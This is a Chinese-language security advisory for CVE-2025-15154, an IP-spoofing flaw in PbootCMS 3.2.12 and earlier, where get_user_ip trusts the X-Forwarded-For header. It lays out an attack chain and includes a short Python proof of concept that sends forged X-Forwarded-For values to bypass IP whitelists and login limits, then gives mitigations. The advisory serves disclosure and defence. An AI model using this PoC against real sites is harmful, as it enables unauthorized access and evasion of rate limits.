PbootCMS up to 3.2.12 get_user_ip函数IP伪造漏洞

漏洞信息

漏洞编号

CVE-2025-15154

漏洞类型

IP伪造/信任代理

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PbootCMS

漏洞概述

PbootCMS是一款开源的PHP内容管理系统，广泛应用于企业网站、政府网站和各类WEB应用平台。该漏洞存在于PbootCMS 3.2.12及之前版本中，由于系统错误地信任了HTTP请求头中的X-Forwarded-For字段来获取用户IP地址，导致攻击者可以通过伪造该请求头来伪造客户端的真实IP地址。这一安全缺陷可能被恶意利用于绕过基于IP的访问控制机制、IP黑名单限制、登录尝试次数限制、IP地理位置限制等功能，同时也可能影响日志记录的准确性和法证分析的可靠性。攻击者无需任何认证即可远程发起攻击，且该漏洞已被公开披露并存在实际利用案例，对使用该CMS的系统构成中等程度的安全威胁。

技术细节

该漏洞的核心问题在于PbootCMS的core/function/handle.php文件中的get_user_ip函数错误地使用了HTTP请求头中的X-Forwarded-For字段来确定客户端的真实IP地址。X-Forwarded-For头字段通常由代理服务器或负载均衡器设置，用于传递原始客户端IP，但其值可以被客户端直接控制。攻击者只需在HTTP请求中添加或修改X-Forwarded-For头，即可伪造任意IP地址。例如，攻击者可以通过Burp Suite等工具在请求中添加X-Forwarded-For: 127.0.0.1来伪造本地访问，或者绕过基于IP的访问控制。由于PbootCMS在多个安全检查和日志功能中依赖get_user_ip函数获取的IP地址，该漏洞的影响范围较广，可能导致认证绕过、恶意行为追踪失效、地理位置限制失效等多种安全问题。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的PbootCMS版本，通过版本探测或公开信息确认版本<=3.2.12

STEP 2

步骤2

攻击者构造恶意HTTP请求，在请求头中添加或修改X-Forwarded-For字段，填入伪造的IP地址

STEP 3

步骤3

攻击者发送带有伪造X-Forwarded-For头的请求，尝试绕过基于IP的访问控制、登录限制或地理限制

STEP 4

步骤4

如果目标系统存在依赖真实IP的安全机制（如IP白名单、登录失败次数限制），攻击者可通过IP伪造绕过这些限制

STEP 5

步骤5

攻击者利用IP伪造进行进一步攻击，如绕过管理员IP限制访问后台、规避安全审计或进行恶意操作后隐藏真实身份

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15154 PoC - IP Spoofing in PbootCMS get_user_ip()
# Target: PbootCMS <= 3.2.12
# Vulnerability: Trusting X-Forwarded-For header for user IP

target_url = "http://target.com/"  # Replace with target URL

# PoC 1: Basic X-Forwarded-For spoofing
headers = {
    'X-Forwarded-For': '127.0.0.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
}

response = requests.get(target_url, headers=headers)
print(f"Status: {response.status_code}")

# PoC 2: Bypassing IP-based restrictions
# Try to bypass admin IP whitelist or login attempt limits
fake_ips = ['192.168.1.1', '10.0.0.1', '172.16.0.1', '8.8.8.8']
for ip in fake_ips:
    headers['X-Forwarded-For'] = ip
    response = requests.get(target_url, headers=headers)
    print(f"Testing IP {ip}: Status {response.status_code}")

影响范围

PbootCMS < 3.2.13

PbootCMS 3.2.12

PbootCMS 3.2.11

PbootCMS 3.2.10

PbootCMS 3.2.0 - 3.2.12

防御指南

临时缓解措施

如果无法立即升级，可临时采取以下措施：1) 在Web服务器层面(如Nginx/Apache)配置严格的IP获取策略，限制X-Forwarded-For的使用；2) 部署WAF规则检测和过滤异常的X-Forwarded-For头；3) 对依赖IP的功能增加额外的安全验证机制，如多因素认证、验证码等；4) 监控异常的IP请求模式，及时发现和阻止IP伪造攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15154
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15154
3 Details https://www.cvedetails.com/cve/CVE-2025-15154/
4 VulDB https://vuldb.com/cve/CVE-2025-15154
5 Link https://note-hxlab.wetolink.com/share/JyBNgF8JagWQ
6 Link https://vuldb.com/?ctiid.338532
7 Link https://vuldb.com/?id.338532
8 Link https://vuldb.com/?submit.719818